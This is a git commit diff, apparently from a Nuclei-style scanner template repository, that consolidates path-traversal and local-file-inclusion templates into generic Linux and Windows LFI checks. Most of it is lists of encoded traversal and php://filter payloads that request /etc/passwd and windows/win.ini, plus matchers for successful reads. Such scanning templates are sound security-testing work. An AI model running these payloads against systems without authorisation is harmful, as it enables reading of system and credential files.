moving files around

2021-08-07 23:02:17 +05:30 · 2021-08-07 23:02:17 +05:30 · 2233ebf3f1
parent aa336ed979
commit 2233ebf3f1
4 changed files with 38 additions and 87 deletions
--- a/fuzzing/arbitrary-file-read.yaml
+++ b/fuzzing/arbitrary-file-read.yaml
@ -1,30 +0,0 @@
-id: arbitrary-file-read
-
-info:
-  name: Arbitrary File Read
-  author: Sushant Kamble (https://in.linkedin.com/in/sushantkamble)
-  severity: high
-  description: Searches for /etc/passwd on passed URLs.
-  tags: fuzz,lfi
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
-      - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
-      - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
-      - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
-      - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
-      - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-      - type: regex
-        regex:
-          - "root:.*:0:0:"
-          - "\\[(font|extension|file)s\\]"
-        condition: or
-        part: body
--- a/fuzzing/directory-traversal.yaml
+++ b/fuzzing/directory-traversal.yaml
@ -1,43 +0,0 @@
-id: directory-traversal
-
-info:
-  name: Generic Directory Traversal
-  author: pentest_swissky
-  severity: high
-  description: Detect basic directory traversal leading to a leak of sensitive files.
-  tags: lfi,fuzz
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/..%5cetc/passwd"
-      - "{{BaseURL}}/..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/./../../../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
-      - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
-      - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
-      - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
-      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
-      - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-      - type: regex
-        regex:
-          - "root:.*:0:0:"
-        part: body
--- a/vulnerabilities/generic/generic-linux-lfi.yaml
+++ b/vulnerabilities/generic/generic-linux-lfi.yaml
@ -1,10 +1,11 @@
-id: generic-lfi-fuzzing
+id: generic-linux-lfi
+
 info:
-  name: Generic LFI Test
-  author: geeknik,unstabl3
+  name: Generic Linux based LFI Test
+  author: geeknik,unstabl3,pentest_swissky,sushantkamble
  severity: high
-  description: A generic test for Local File Inclusion
-  tags: fuzz,lfi
+  description:  Searches for /etc/passwd on passed URLs
+  tags: linux,lfi

 requests:
  - method: GET
@ -19,6 +20,31 @@ requests:
      - "{{BaseURL}}/?q=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&s=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&search=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&id=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&action=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keyword=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&query=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keywords=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&url=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&view=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&cat=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&name=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&key=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&p=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
      - "{{BaseURL}}/?q=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&s=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&search=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&id=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&action=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keyword=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&query=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keywords=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&url=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&view=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&cat=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&name=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&key=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&p=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd"
      - "{{BaseURL}}/etc/passwd"
+      - "{{BaseURL}}/..%5cetc/passwd"
+      - "{{BaseURL}}/..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/..%5c..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/static/..%5cetc/passwd"
+      - "{{BaseURL}}/static/..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/static/..%5c..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/./../../../../../../../../../../etc/passwd"
+      - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
+      - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
+      - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
+      - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
+      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
+      - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
+      - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+      - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+      - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+
    matchers:
      - type: regex
        words:
--- a/vulnerabilities/generic/generic-windows-lfi.yaml
+++ b/vulnerabilities/generic/generic-windows-lfi.yaml
@ -1,10 +1,10 @@
-id: azure-directory-traversal
+id: generic-windows-lfi

 info:
-  name: Azure Directory Traversal
-  author: mesaglio
+  name: Generic Windows based LFI Test
+  author: mesaglio,sushantkamble
  severity: high
-  description: Detect azure directory traversal hosts file.
+  description:  Searches for /windows/win.ini on passed URLs
  tags: azure,windows,lfi

 requests:
@ -17,13 +17,11 @@ requests:
      - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini"
      - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini"
      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
+      - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
+      - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
+      - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"

-    matchers-condition: and
    matchers:
-      - type: status
-        status:
-          - 200
-
      - type: word
        words:
          - "bit app support"